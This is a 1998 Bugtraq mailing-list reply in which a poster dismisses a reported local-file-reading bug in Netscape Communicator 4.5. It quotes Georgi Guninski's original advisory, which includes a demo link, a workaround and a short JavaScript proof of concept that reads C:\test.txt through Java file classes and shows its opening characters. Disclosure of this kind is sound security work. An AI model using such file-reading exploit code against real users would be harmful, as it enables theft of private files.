[8624] in bugtraq
Re: Netscape Communicator 4.5 can read local files
daemon@ATHENA.MIT.EDU (Bill Lavalette)
Tue Nov 24 23:03:50 1998
Date: Mon, 23 Nov 1998 11:31:52 -0800
Reply-To: Bill Lavalette <BillL@METAINFO.COM>
From: Bill Lavalette <BillL@METAINFO.COM>
X-To: Georgi Guninski <guninski@HOTMAIL.COM>
To: BUGTRAQ@NETSPACE.ORG
Hi -
this appears to be no different then typing c:\ in the location of any
browser hardly a security hole in my opinion the test site did not
prove that this is a potential or current problem.
Bill
>-----Original Message-----
>From: Georgi Guninski [SMTP:guninski@HOTMAIL.COM]
>Sent: Monday, November 23, 1998 10:37 AM
>To: BUGTRAQ@netspace.org
>Subject: Netscape Communicator 4.5 can read local files
>
>There is a bug in Netscape Communicator 4.5 for Windows 95 and 4.05 for
>WinNT 4.0
>(probably others) which allows reading files from the user's computer.
>It is not necessary the file name to be known, because directories may
>be browsed.
>The contents of the file may be sent to an arbitrary host. In order this
>to work, you need both Java and Javascript
>enabled. The bug may be exploited by email message.
>
>Demonstration is available at:
>http://www.geocities.com/ResearchTriangle/1711/b6.html
>
>Workaround: Disable Javascript or Java.
>
>
>The Javascript code is:
>
>sl=window.open("wysiwyg://1/file:///C|/");
>sl2=sl.window.open();
>sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your
>file: \";var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new
>java.io.FileInputStream(f); i=0; while ( ((a=fis.read()) != -1) &&
>(i<100) ) { b += String.fromCharCode(a);i++;}alert(b);</'+'SCRIPT>'";
>
>Regards,
>Georgi Guninski
>http://www.geocities.com/ResearchTriangle/1711
>
>
>
>______________________________________________________
>Get Your Private, Free Email at http://www.hotmail.com